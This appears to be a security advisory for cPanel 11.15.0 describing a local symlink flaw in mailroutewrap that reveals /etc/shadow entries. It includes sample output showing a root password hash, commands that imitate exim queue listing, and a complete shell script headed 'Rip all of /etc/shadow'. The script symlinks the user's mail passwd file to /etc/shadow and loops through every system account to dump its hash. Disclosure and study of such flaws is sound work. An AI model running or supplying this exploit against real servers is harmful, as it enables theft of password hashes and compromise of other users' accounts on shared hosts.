cPanel 11.15.0-RELEASE_18420 - local users could view any entry from /etc/shadow via mailroutewrap
DESCRIPTION
A symlink attack in /home/username/etc/mail/domain/shadow allowed any entry from /etc/shadow to be displayed to the user. The local user needed to have or create an email account that acted as a catch-all to take advantage of this issue.
[user@host ~]$ ./11.15.0-RELEASE_18420-view_any_line_from_etc_shadow.sh root:$1$BxAWmn63$J4Iyx.3Ki6wtUo1NS7A2e/:14457:0:99999:7:::
This bug was initially discovered as a way for local users to effectively run exim -bp and exim -bpc via the following commands:
[user@host ~]$ /usr/local/cpanel/bin/mailroutewrap --bp 37m 350 1MfI5k-00048d-Dk <user@example.com> user@example.com [user@host ~]$ /usr/local/cpanel/bin/mailroutewrap --bpc 1
The symlink attack wasn't discovered until later, at which time the issue was reported.
IMPACT
Local users could obtain any entry of their choice from /etc/shadow, or execute the equivalent of exim -bp or exim -bpc.
#!/bin/sh ######################## # # Rip all of /etc/shadow # ######################## DOMAIN=`ls /home/$USER/etc | grep \\\. | head -1` if [ -d /home/$USER/etc/$DOMAIN ] ; then cd /home/$USER/etc/$DOMAIN else exit fi mv passwd passwd.orig 2>/dev/null ln -s /etc/shadow passwd for x in `cut -d : -f 1 /etc/passwd` ; do ENTRY=`/usr/local/cpanel/bin/mailroutewrap $x@$DOMAIN 2>&1 | \ grep 'lookup yielded:' | tail -1 | awk '{print $3}' ;` echo $x:$ENTRY done rm -f passwd mv passwd.orig passwd 2>/dev/null